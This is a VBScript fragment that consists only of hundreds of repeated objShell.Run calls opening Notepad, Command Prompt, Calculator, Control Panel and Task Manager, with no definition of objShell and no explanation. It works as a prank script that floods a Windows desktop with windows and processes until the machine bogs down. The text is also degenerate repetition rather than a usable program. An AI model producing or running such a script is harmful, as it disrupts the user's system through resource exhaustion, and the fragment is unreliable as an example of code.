objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
